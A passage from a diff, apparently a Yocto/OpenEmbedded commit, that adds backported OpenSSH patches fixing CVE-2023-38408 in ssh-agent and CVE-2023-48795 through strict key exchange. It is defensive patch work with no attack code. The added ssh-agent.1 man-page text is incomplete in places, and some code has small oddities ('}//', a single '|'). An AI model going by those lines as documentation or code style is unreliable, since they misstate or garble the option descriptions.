200+ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
201+ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
202+ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
203+ goto out;
204+ if (sshbuf_len(b) != 0) {
205+ r = SSH_ERR_INVALID_FORMAT;
206+ goto out;
207+ }
208+ /* success */
209+ r = 0;
210+ out:
211 sshbuf_free(b);
212- if (matched)
213+ return r;
214+}
215+
216+/*
217+ * This function inspects a message to be signed by a FIDO key that has a
218+ * web-like application string (i.e. one that does not begin with "ssh:".
219+ * It checks that the message is one of those expected for SSH operations
220+ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
221+ * for the web.
222+ */
223+static int
224+check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
225+{
226+ if (parse_userauth_request(data, key, NULL, NULL) == 0) {
227+ debug("%s: signed data matches public key userauth request", __func__);
228 return 1;
229+ }
230+ if (parse_sshsig_request(data) == 0) {
231+ debug("%s: signed data matches SSHSIG signature request", __func__);
232+ return 1;
233+ }
234
235- /* XXX CA signature operation */
236+ /* XXX check CA signature operation */
237
238 error("web-origin key attempting to sign non-SSH message");
239 return 0;
240@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
241 static void
242 process_sign_request2(SocketEntry *e)
243 {
244- const u_char *data;
245 u_char *signature = NULL;
246- size_t dlen, slen = 0;
247+ size_t i, slen = 0;
248 u_int compat = 0, flags;
249 int r, ok = -1;
250 char *fp = NULL;
251- struct sshbuf *msg;
252+ struct sshbuf *msg = NULL, *data = NULL;
253 struct sshkey *key = NULL;
254 struct identity *id;
255 struct notifier_ctx *notifier = NULL;
256
257- if ((msg = sshbuf_new()) == NULL)
258+ debug("%s: entering", __func__);
259+
260+ if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)
261 fatal("%s: sshbuf_new failed", __func__);
262 if ((r = sshkey_froms(e->request, &key)) != 0 ||
263- (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
264+ (r = sshbuf_get_stringb(e->request, data)) != 0 ||
265 (r = sshbuf_get_u32(e->request, &flags)) != 0) {
266 error("%s: couldn't parse request: %s", __func__, ssh_err(r));
267 goto send;
268@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
269 verbose("%s: %s key not found", __func__, sshkey_type(key));
270 goto send;
271 }
272- if (id->confirm && confirm_key(id) != 0) {
273+ if (id->confirm && confirm_key(id, NULL) != 0) {
274 verbose("%s: user refused key", __func__);
275 goto send;
276 }
277 if (sshkey_is_sk(id->key)) {
278 if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
279- !check_websafe_message_contents(key, data, dlen)) {
280+ !check_websafe_message_contents(key, data)) {
281 /* error already logged */
282 goto send;
283 }
284@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
285 }
286 }
287 if ((r = sshkey_sign(id->key, &signature, &slen,
288- data, dlen, agent_decode_alg(key, flags),
289+ sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
290 id->sk_provider, compat)) != 0) {
291 error("%s: sshkey_sign: %s", __func__, ssh_err(r));
292 goto send;
293@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
294 ok = 0;
295 send:
296 notify_complete(notifier);
297- sshkey_free(key);
298- free(fp);
299+
300 if (ok == 0) {
301 if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
302 (r = sshbuf_put_string(msg, signature, slen)) != 0)
303@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
304 if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
305 fatal("%s: buffer error: %s", __func__, ssh_err(r));
306
307+ sshbuf_free(data);
308 sshbuf_free(msg);
309+ sshkey_free(key);
310+ free(fp);
311 free(signature);
312 }
313
314--
3152.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
1From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Fri, 29 Jan 2021 06:28:10 +0000
4Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
5 the fuzzer I'm
6
7writing a bit easier
8
9OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
10
11Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
12CVE: CVE-2023-38408
13Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
14---
15 ssh-agent.c | 4 ++--
16 1 file changed, 2 insertions(+), 2 deletions(-)
17
18diff --git a/ssh-agent.c b/ssh-agent.c
19index 7ad323c..c99927c 100644
20--- a/ssh-agent.c
21+++ b/ssh-agent.c
22@@ -1,4 +1,4 @@
23-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
24+/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
25 /*
26 * Author: Tatu Ylonen <ylo@cs.hut.fi>
27 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
28@@ -108,7 +108,7 @@ typedef enum {
29 AUTH_CONNECTION
30 } sock_type;
31
32-typedef struct {
33+typedef struct socket_entry {
34 int fd;
35 sock_type type;
36 struct sshbuf *input;
37--
382.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
1From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Fri, 29 Jan 2021 06:29:46 +0000
4Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
5
6OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
7
8Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
9CVE: CVE-2023-38408
10Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
11---
12 ssh-agent.c | 8 ++++----
13 1 file changed, 4 insertions(+), 4 deletions(-)
14
15diff --git a/ssh-agent.c b/ssh-agent.c
16index c99927c..7f1e14b 100644
17--- a/ssh-agent.c
18+++ b/ssh-agent.c
19@@ -1,4 +1,4 @@
20-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
21+/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
22 /*
23 * Author: Tatu Ylonen <ylo@cs.hut.fi>
24 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
25@@ -103,9 +103,9 @@
26 #define AGENT_RBUF_LEN (4096)
27
28 typedef enum {
29- AUTH_UNUSED,
30- AUTH_SOCKET,
31- AUTH_CONNECTION
32+ AUTH_UNUSED = 0,
33+ AUTH_SOCKET = 1,
34+ AUTH_CONNECTION = 2,
35 } sock_type;
36
37 typedef struct socket_entry {
38--
392.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
new file mode 100644
index 0000000000..c300393ebf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
1From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Sun, 19 Dec 2021 22:09:23 +0000
4Subject: [PATCH 11/12] upstream: ssh-agent side of binding
5
6record session ID/hostkey/forwarding status for each active socket.
7
8Attempt to parse data-to-be-signed at signature request time and extract
9session ID from the blob if it is a pubkey userauth request.
10
11ok markus@
12
13OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
14
15Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
16CVE: CVE-2023-38408
17Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
18---
19 authfd.h | 3 +
20 ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
21 2 files changed, 170 insertions(+), 8 deletions(-)
22
23diff --git a/authfd.h b/authfd.h
24index c3bf625..9cc9807 100644
25--- a/authfd.h
26+++ b/authfd.h
27@@ -76,6 +76,9 @@ int ssh_agent_sign(int sock, const struct sshkey *key,
28 #define SSH2_AGENTC_ADD_ID_CONSTRAINED 25
29 #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
30
31+/* generic extension mechanism */
32+#define SSH_AGENTC_EXTENSION 27
33+
34 #define SSH_AGENT_CONSTRAIN_LIFETIME 1
35 #define SSH_AGENT_CONSTRAIN_CONFIRM 2
36 #define SSH_AGENT_CONSTRAIN_MAXSIGN 3
37diff --git a/ssh-agent.c b/ssh-agent.c
38index 7f1e14b..01c7f2b 100644
39--- a/ssh-agent.c
40+++ b/ssh-agent.c
41@@ -1,4 +1,4 @@
42-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
43+/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
44 /*
45 * Author: Tatu Ylonen <ylo@cs.hut.fi>
46 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
47@@ -98,9 +98,15 @@
48 #endif
49
50 /* Maximum accepted message length */
51-#define AGENT_MAX_LEN (256*1024)
52+#define AGENT_MAX_LEN (256*1024)
53 /* Maximum bytes to read from client socket */
54-#define AGENT_RBUF_LEN (4096)
55+#define AGENT_RBUF_LEN (4096)
56+/* Maximum number of recorded session IDs/hostkeys per connection */
57+#define AGENT_MAX_SESSION_IDS 16
58+/* Maximum size of session ID */
59+#define AGENT_MAX_SID_LEN 128
60+
61+/* XXX store hostkey_sid in a refcounted tree */
62
63 typedef enum {
64 AUTH_UNUSED = 0,
65@@ -108,12 +114,20 @@ typedef enum {
66 AUTH_CONNECTION = 2,
67 } sock_type;
68
69+struct hostkey_sid {
70+ struct sshkey *key;
71+ struct sshbuf *sid;
72+ int forwarded;
73+};
74+
75 typedef struct socket_entry {
76 int fd;
77 sock_type type;
78 struct sshbuf *input;
79 struct sshbuf *output;
80 struct sshbuf *request;
81+ size_t nsession_ids;
82+ struct hostkey_sid *session_ids;
83 } SocketEntry;
84
85 u_int sockets_alloc = 0;
86@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
87 static void
88 close_socket(SocketEntry *e)
89 {
90+ size_t i;
91+
92 close(e->fd);
93 sshbuf_free(e->input);
94 sshbuf_free(e->output);
95 sshbuf_free(e->request);
96+ for (i = 0; i < e->nsession_ids; i++) {
97+ sshkey_free(e->session_ids[i].key);
98+ sshbuf_free(e->session_ids[i].sid);
99+ }
100+ free(e->session_ids);
101 memset(e, '\0', sizeof(*e));
102 e->fd = -1;
103 e->type = AUTH_UNUSED;
104@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
105 return 0;
106 }
107
108+static int
109+buf_equal(const struct sshbuf *a, const struct sshbuf *b)
110+{
111+ if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
112+ return SSH_ERR_INVALID_ARGUMENT;
113+ if (sshbuf_len(a) != sshbuf_len(b))
114+ return SSH_ERR_INVALID_FORMAT;
115+ if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
116+ return SSH_ERR_INVALID_FORMAT;
117+ return 0;
118+}
119+
120 /* ssh2 only */
121 static void
122 process_sign_request2(SocketEntry *e)
123@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
124 size_t i, slen = 0;
125 u_int compat = 0, flags;
126 int r, ok = -1;
127- char *fp = NULL;
128- struct sshbuf *msg = NULL, *data = NULL;
129+ char *fp = NULL, *user = NULL, *sig_dest = NULL;
130+ struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
131 struct sshkey *key = NULL;
132 struct identity *id;
133 struct notifier_ctx *notifier = NULL;
134@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
135 verbose("%s: %s key not found", __func__, sshkey_type(key));
136 goto send;
137 }
138- if (id->confirm && confirm_key(id, NULL) != 0) {
139+ /*
140+ * If session IDs were recorded for this socket, then use them to
141+ * annotate the confirmation messages with the host keys.
142+ */
143+ if (e->nsession_ids > 0 &&
144+ parse_userauth_request(data, key, &user, &sid) == 0) {
145+ /*
146+ * session ID from userauth request should match the final
147+ * ID in the list recorded in the socket, unless the ssh
148+ * client at that point lacks the binding extension (or if
149+ * an attacker is trying to steal use of the agent).
150+ */
151+ i = e->nsession_ids - 1;
152+ if (buf_equal(sid, e->session_ids[i].sid) == 0) {
153+ if ((fp = sshkey_fingerprint(e->session_ids[i].key,
154+ SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
155+ fatal("%s: fingerprint failed", __func__);
156+ debug3("%s: destination %s %s (slot %zu)", __func__,
157+ sshkey_type(e->session_ids[i].key), fp, i);
158+ xasprintf(&sig_dest, "public key request for "
159+ "target user \"%s\" to %s %s", user,
160+ sshkey_type(e->session_ids[i].key), fp);
161+ free(fp);
162+ fp = NULL;
163+ }
164+ }//
165+ if (id->confirm && confirm_key(id, sig_dest) != 0) {
166 verbose("%s: user refused key", __func__);
167 goto send;
168 }
169@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
170 SSH_FP_DEFAULT)) == NULL)
171 fatal("%s: fingerprint failed", __func__);
172 notifier = notify_start(0,
173- "Confirm user presence for key %s %s",
174- sshkey_type(id->key), fp);
175+ "Confirm user presence for key %s %s%s%s",
176+ sshkey_type(id->key), fp,
177+ sig_dest == NULL ? "" : "\n",
178+ sig_dest == NULL ? "" : sig_dest);
179 }
180 }
181 if ((r = sshkey_sign(id->key, &signature, &slen,
182@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
183 if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
184 fatal("%s: buffer error: %s", __func__, ssh_err(r));
185
186+ sshbuf_free(sid);
187 sshbuf_free(data);
188 sshbuf_free(msg);
189 sshkey_free(key);
190 free(fp);
191 free(signature);
192+ free(sig_dest);
193+ free(user);
194 }
195
196 /* shared */
197@@ -925,6 +989,98 @@ send:
198 }
199 #endif /* ENABLE_PKCS11 */
200
201+static int
202+process_ext_session_bind(SocketEntry *e)
203+{
204+ int r, sid_match, key_match;
205+ struct sshkey *key = NULL;
206+ struct sshbuf *sid = NULL, *sig = NULL;
207+ char *fp = NULL;
208+ u_char fwd;
209+ size_t i;
210+
211+ debug2("%s: entering", __func__);
212+ if ((r = sshkey_froms(e->request, &key)) != 0 ||
213+ (r = sshbuf_froms(e->request, &sid)) != 0 ||
214+ (r = sshbuf_froms(e->request, &sig)) != 0 ||
215+ (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
216+ error("%s: parse: %s", __func__, ssh_err(r));
217+ goto out;
218+ }
219+ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
220+ SSH_FP_DEFAULT)) == NULL)
221+ fatal("%s: fingerprint failed", __func__);
222+ /* check signature with hostkey on session ID */
223+ if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
224+ sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
225+ error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
226+ goto out;
227+ }
228+ /* check whether sid/key already recorded */
229+ for (i = 0; i < e->nsession_ids; i++) {
230+ sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
231+ key_match = sshkey_equal(key, e->session_ids[i].key);
232+ if (sid_match && key_match) {
233+ debug("%s: session ID already recorded for %s %s", __func__,
234+ sshkey_type(key), fp);
235+ r = 0;
236+ goto out;
237+ } else if (sid_match) {
238+ error("%s: session ID recorded against different key "
239+ "for %s %s", __func__, sshkey_type(key), fp);
240+ r = -1;
241+ goto out;
242+ }
243+ /*
244+ * new sid with previously-seen key can happen, e.g. multiple
245+ * connections to the same host.
246+ */
247+ }
248+ /* record new key/sid */
249+ if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
250+ error("%s: too many session IDs recorded", __func__);
251+ goto out;
252+ }
253+ e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
254+ e->nsession_ids + 1, sizeof(*e->session_ids));
255+ i = e->nsession_ids++;
256+ debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
257+ AGENT_MAX_SESSION_IDS);
258+ e->session_ids[i].key = key;
259+ e->session_ids[i].forwarded = fwd != 0;
260+ key = NULL; /* transferred */
261+ /* can't transfer sid; it's refcounted and scoped to request's life */
262+ if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
263+ fatal("%s: sshbuf_new", __func__);
264+ if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
265+ fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
266+ /* success */
267+ r = 0;
268+ out:
269+ sshkey_free(key);
270+ sshbuf_free(sid);
271+ sshbuf_free(sig);
272+ return r == 0 ? 1 : 0;
273+}
274+
275+static void
276+process_extension(SocketEntry *e)
277+{
278+ int r, success = 0;
279+ char *name;
280+
281+ debug2("%s: entering", __func__);
282+ if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
283+ error("%s: parse: %s", __func__, ssh_err(r));
284+ goto send;
285+ }
286+ if (strcmp(name, "session-bind@openssh.com") == 0)
287+ success = process_ext_session_bind(e);
288+ else
289+ debug("%s: unsupported extension \"%s\"", __func__, name);
290+send:
291+ send_status(e, success);
292+}
293 /*
294 * dispatch incoming message.
295 * returns 1 on success, 0 for incomplete messages or -1 on error.
296@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
297 process_remove_smartcard_key(e);
298 break;
299 #endif /* ENABLE_PKCS11 */
300+ case SSH_AGENTC_EXTENSION:
301+ process_extension(e);
302+ break;
303 default:
304 /* Unknown message. Respond with failure. */
305 error("Unknown message %d", type);
306--
3072.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
new file mode 100644
index 0000000000..934775bdec
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
1From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 13:56:33 +0000
4Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
5 provider libraries to ssh-agent by default.
6
7The old behaviour of allowing remote clients from loading providers
8can be restored using `ssh-agent -O allow-remote-pkcs11`.
9
10Detection of local/remote clients requires a ssh(1) that supports
11the `session-bind@openssh.com` extension. Forwarding access to a
12ssh-agent socket using non-OpenSSH tools may circumvent this control.
13
14ok markus@
15
16OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
17
18Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
19CVE: CVE-2023-38408
20Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
21---
22 ssh-agent.1 | 20 ++++++++++++++++++++
23 ssh-agent.c | 26 ++++++++++++++++++++++++--
24 2 files changed, 44 insertions(+), 2 deletions(-)
25
26diff --git a/ssh-agent.1 b/ssh-agent.1
27index fff0db6..a0f1e21 100644
28--- a/ssh-agent.1
29+++ b/ssh-agent.1
30@@ -97,6 +97,26 @@ The default is
31 Kill the current agent (given by the
32 .Ev SSH_AGENT_PID
33 environment variable).
34+Currently two options are supported:
35+.Cm allow-remote-pkcs11
36+and
37+.Pp
38+The
39+.Cm allow-remote-pkcs11
40+option allows clients of a forwarded
41+.Nm
42+to load PKCS#11 or FIDO provider libraries.
43+By default only local clients may perform this operation.
44+Note that signalling that a
45+.Nm
46+client remote is performed by
47+.Xr ssh 1 ,
48+and use of other tools to forward access to the agent socket may circumvent
49+this restriction.
50+.Pp
51+The
52+.Cm no-restrict-websafe ,
53+instructs
54 .It Fl P Ar provider_whitelist
55 Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
56 shared libraries that may be used with the
57diff --git a/ssh-agent.c b/ssh-agent.c
58index 01c7f2b..40c1b6b 100644
59--- a/ssh-agent.c
60+++ b/ssh-agent.c
61@@ -1,4 +1,4 @@
62-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
63+/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
64 /*
65 * Author: Tatu Ylonen <ylo@cs.hut.fi>
66 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
67@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
68 /* PKCS#11/Security key path whitelist */
69 static char *provider_whitelist;
70
71+/*
72+ * Allows PKCS11 providers or SK keys that use non-internal providers to
73+ * be added over a remote connection (identified by session-bind@openssh.com).
74+ */
75+static int remote_add_provider;
76+
77 /* locking */
78 #define LOCK_SIZE 32
79 #define LOCK_SALT_SIZE 16
80@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
81 if (strcasecmp(sk_provider, "internal") == 0) {
82 debug("%s: internal provider", __func__);
83 } else {
84+ if (e->nsession_ids != 0 && !remote_add_provider) {
85+ verbose("failed add of SK provider \"%.100s\": "
86+ "remote addition of providers is disabled",
87+ sk_provider);
88+ free(sk_provider);
89+ free(comment);
90+ sshkey_free(k);
91+ goto send;
92+ }
93 if (realpath(sk_provider, canonical_provider) == NULL) {
94 verbose("failed provider \"%.100s\": "
95 "realpath: %s", sk_provider,
96@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
97 goto send;
98 }
99 }
100+ if (e->nsession_ids != 0 && !remote_add_provider) {
101+ verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
102+ "providers is disabled", provider);
103+ goto send;
104+ }
105 if (realpath(provider, canonical_provider) == NULL) {
106 verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
107 provider, strerror(errno));
108@@ -1556,7 +1576,9 @@ main(int ac, char **av)
109 break;
110 case 'O':
111 if (strcmp(optarg, "no-restrict-websafe") == 0)
112- restrict_websafe = 0;
113+ restrict_websafe = 0;
114+ else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
115+ remote_add_provider = 1;
116 else
117 fatal("Unknown -O option");
118 break;
119--
1202.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
new file mode 100644
index 0000000000..57c45e3d93
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
1(modified to not remove ssh_packet_read_expect(), to add to
2KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
3kex_proposal_populate_entries(), replace debug*_f() with debug*(),
4error*_f() with error*(), and fatal_f() with fatal())
5
6Backport of:
7
8From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
9From: "djm@openbsd.org" <djm@openbsd.org>
10Date: Mon, 18 Dec 2023 14:45:17 +0000
11Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
12
13This adds a protocol extension to improve the integrity of the SSH
14transport protocol, particular in and around the initial key exchange
15(KEX) phase.
16
17Full details of the extension are in the PROTOCOL file.
18
19with markus@
20
21OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
22
23Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
24Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
25CVE: CVE-2023-48795
26Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
27---
28 PROTOCOL | 26 +++++++++++++++++
29 kex.c | 68 +++++++++++++++++++++++++++++++++-----------
30 kex.h | 1 +
31 packet.c | 78 ++++++++++++++++++++++++++++++++++++++-------------
32 sshconnect2.c | 14 +++------
33 sshd.c | 7 +++--
34 6 files changed, 146 insertions(+), 48 deletions(-)
35
36diff --git a/PROTOCOL b/PROTOCOL
37index f75c1c0..89bddfe 100644
38--- a/PROTOCOL
39+++ b/PROTOCOL
40@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
41 described at:
42 http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
43
44+1.9 transport: strict key exchange extension
45+
46+OpenSSH supports a number of transport-layer hardening measures under
47+a "strict KEX" feature. This feature is signalled similarly to the
48+RFC8308 ext-info feature: by including a additional algorithm in the
49+initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
50+"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
51+may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
52+are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
53+if they are present in subsequent SSH2_MSG_KEXINIT packets.
54+
55+When an endpoint that supports this extension observes this algorithm
56+name in a peer's KEXINIT packet, it MUST make the following changes to
57+the the protocol:
58+
59+a) During initial KEX, terminate the connection if any unexpected or
60+ out-of-sequence packet is received. This includes terminating the
61+ connection if the first packet received is not SSH2_MSG_KEXINIT.
62+ Unexpected packets for the purpose of strict KEX include messages
63+ that are otherwise valid at any time during the connection such as
64+ SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
65+b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
66+ packet sequence number to zero. This behaviour persists for the
67+ duration of the connection (i.e. not just the first
68+ SSH2_MSG_NEWKEYS).
69+
70 2. Connection protocol changes
71
72 2.1. connection: Channel write close extension "eow@openssh.com"
73diff --git a/kex.c b/kex.c
74index ce85f04..3129a4e 100644
75--- a/kex.c
76+++ b/kex.c
77@@ -63,7 +63,7 @@
78 #include "digest.h"
79
80 /* prototype */
81-static int kex_choose_conf(struct ssh *);
82+static int kex_choose_conf(struct ssh *, uint32_t seq);
83 static int kex_input_newkeys(int, u_int32_t, struct ssh *);
84
85 static const char *proposal_names[PROPOSAL_MAX] = {
86@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
87 return 1;
88 }
89
90+/* returns non-zero if proposal contains any algorithm from algs */
91+static int
92+has_any_alg(const char *proposal, const char *algs)
93+{
94+ char *cp;
95+
96+ if ((cp = match_list(proposal, algs, NULL)) == NULL)
97+ return 0;
98+ free(cp);
99+ return 1;
100+}
101+
102 /*
103 * Concatenate algorithm names, avoiding duplicates in the process.
104 * Caller must free returned string.
105@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
106 char *
107 kex_names_cat(const char *a, const char *b)
108 {
109- char *ret = NULL, *tmp = NULL, *cp, *p, *m;
110+ char *ret = NULL, *tmp = NULL, *cp, *p;
111 size_t len;
112
113 if (a == NULL || *a == '\0')
114@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
115 }
116 strlcpy(ret, a, len);
117 for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
118- if ((m = match_list(ret, p, NULL)) != NULL) {
119- free(m);
120+ if (has_any_alg(ret, p))
121 continue; /* Algorithm already present */
122- }
123 if (strlcat(ret, ",", len) >= len ||
124 strlcat(ret, p, len) >= len) {
125 free(tmp);
126@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
127 {
128 int r;
129
130- error("kex protocol error: type %d seq %u", type, seq);
131+ /* If in strict mode, any unexpected message is an error */
132+ if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
133+ ssh_packet_disconnect(ssh, "strict KEX violation: "
134+ "unexpected packet type %u (seqnr %u)", type, seq);
135+ }
136+ error("type %u seq %u", type, seq);
137 if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
138 (r = sshpkt_put_u32(ssh, seq)) != 0 ||
139 (r = sshpkt_send(ssh)) != 0)
140@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
141 ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
142 if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
143 return r;
144+ if (ninfo >= 1024) {
145+ error("SSH2_MSG_EXT_INFO with too many entries, expected "
146+ "<=1024, received %u", ninfo);
147+ return dispatch_protocol_error(type, seq, ssh);
148+ }
149 for (i = 0; i < ninfo; i++) {
150 if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
151 return r;
152@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
153 error("%s: no hex", __func__);
